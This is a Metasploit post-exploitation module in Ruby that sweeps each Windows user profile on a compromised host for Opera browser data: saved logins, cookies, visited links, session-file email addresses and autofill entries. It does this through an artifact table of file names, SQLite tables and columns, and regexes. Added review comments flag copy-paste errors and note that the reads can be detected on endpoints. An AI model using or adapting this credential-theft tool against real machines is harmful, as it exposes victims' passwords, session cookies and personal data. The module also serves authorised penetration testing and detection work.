GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/windows/gather/credentials/opera.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
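# Post module that hands a table of Opera profile artifacts to the PackRat
# mixin for every user profile found on a Windows meterpreter session.
#
# The class itself contains no collection logic: it declares ARTIFACTS,
# registers the filtering options, and calls run_packrat once per profile.
# How files are located, copied and parsed is decided inside
# Msf::Post::Windows::Packrat, which is not part of this file.
#
# Detection note: every entry below names a file under the user's AppData
# 'Opera Software' directory ('Login Data', 'Cookies', 'Visited Links',
# 'Session*', 'Web Data'). Reads of those files by a process other than the
# browser are a useful signal for endpoint monitoring.
class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Msf::Post::Windows::UserProfiles
  include Msf::Post::Windows::Packrat

  # This associative array defines the artifacts known to PackRat.
  #
  # Top-level keys name the application and its category; each element of
  # :gatherable_artifacts describes one file to look for, plus either a
  # :sql_search (table and columns) or a :regex_search (patterns) to run on it.
  # The :filetypes strings double as the accepted values of the ARTIFACTS
  # option (see #initialize), so they are part of the module's interface.
  ARTIFACTS =
    {
      application: 'opera',
      app_category: 'browsers',
      gatherable_artifacts: [
        {
          filetypes: 'logins',
          path: 'AppData',
          dir: 'Opera Software',
          artifact_file_name: 'Login Data',
          # Was "Opera's sent and received emails", copied from another module;
          # the entry reads the logins table, not mail.
          description: "Opera's saved logins",
          credential_type: 'sqlite',
          sql_search: [
            {
              # Was "SRware's Login data" (copy-paste from a different browser).
              sql_description: "Database Commands which exports Opera's Login data",
              sql_table: 'logins',
              sql_column: 'action_url, username_value'
            }
          ]
        },
        {
          filetypes: 'cookies',
          path: 'AppData',
          dir: 'Opera Software',
          artifact_file_name: 'Cookies',
          description: "Opera's Cookies",
          credential_type: 'sqlite',
          sql_search: [
            {
              # Was "SRware's Login data" (copy-paste from a different browser).
              sql_description: "Database Commands which exports Opera's Cookies",
              sql_table: 'cookies',
              sql_column: 'host_key, name, path'
            }
          ]
        },
        {
          filetypes: 'web_history',
          path: 'AppData',
          dir: 'Opera Software',
          artifact_file_name: 'Visited Links',
          description: "Opera's Visited Links",
          # NOTE(review): this is the only entry typed 'database' rather than
          # 'sqlite', its sql_description is cut off, and its table/columns are
          # identical to the cookies entry above. It looks copy-pasted; confirm
          # against the Packrat mixin before relying on its output.
          credential_type: 'database',
          sql_search: [
            {
              sql_description: 'Database Commands which exports ',
              sql_table: 'cookies',
              sql_column: 'host_key, name, path'
            }
          ]
        },
        {
          filetypes: 'Email',
          path: 'AppData',
          dir: 'Opera Software',
          artifact_file_name: 'Session*',
          description: 'Emails stored in session file',
          credential_type: 'text',
          regex_search: [
            {
              extraction_description: 'searches for Email TO/FROM address',
              extraction_type: 'Email addresses',
              regex: [
                '(?i-mx:email=.*)',
              ]
            }
          ]
        },
        {
          # Spelling kept as-is: this string is one of the ARTIFACTS option
          # values, so correcting it would change what an operator has to type.
          filetypes: 'personal infomration',
          path: 'AppData',
          dir: 'Opera Software',
          artifact_file_name: 'Web Data',
          # Was 'Auto filles sotred in the database'.
          description: 'Auto-fill entries stored in the database',
          credential_type: 'sqlite',
          sql_search: [
            {
              sql_description: 'Database Commands which exports stored auto-fill data',
              sql_table: 'autofill',
              sql_column: 'name, value'
            }
          ]
        }
      ]
    }.freeze

  # Registers the module metadata and its datastore options.
  #
  # @param info [Hash] metadata supplied by the framework, merged with the
  #   values below through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Opera credential gatherer',
        'Description' => %q{
          PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.
          PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.
          Further details can be found in the module documentation.
          This is a module that searches for Opera credentials on a windows remote host.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Kazuyoshi Maruta',
          'Daniel Hallsworth',
          'Barwar Salim M',
          'Z. Cliffe Schreuders', # http://z.cliffe.schreuders.org
        ],
        'Platform' => ['win'],
        'SessionTypes' => ['meterpreter'],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [],
          # NOTE(review): declared empty here; whether the Packrat mixin leaves
          # anything behind on the target cannot be told from this file.
          'SideEffects' => []
        }
      )
    )

    register_options(
      [
        # REGEX is not read anywhere in this class; presumably the Packrat
        # mixin consumes it. Verify there.
        OptRegexp.new('REGEX', [false, 'Match a regular expression', '^password']),
        OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
        OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
        # enumerates the options from the :filetypes of the ARTIFACTS table
        # defined above, with 'All' prepended as the default
        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', ARTIFACTS[:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])
      ]
    )
  end

  # Prints the active filter options, then runs PackRat with the ARTIFACTS
  # table once for each user profile returned by grab_user_profiles.
  #
  # @return [void]
  def run
    print_status('Filtering based on these selections: ')
    print_status("ARTIFACTS: #{datastore['ARTIFACTS'].capitalize}")
    print_status("STORE_LOOT: #{datastore['STORE_LOOT']}")
    print_status("EXTRACT_DATA: #{datastore['EXTRACT_DATA']}\n")

    # used to grab files for each user on the remote host
    grab_user_profiles.each do |userprofile|
      run_packrat(userprofile, ARTIFACTS)
    end

    print_status('PackRat credential sweep Completed')
  end
end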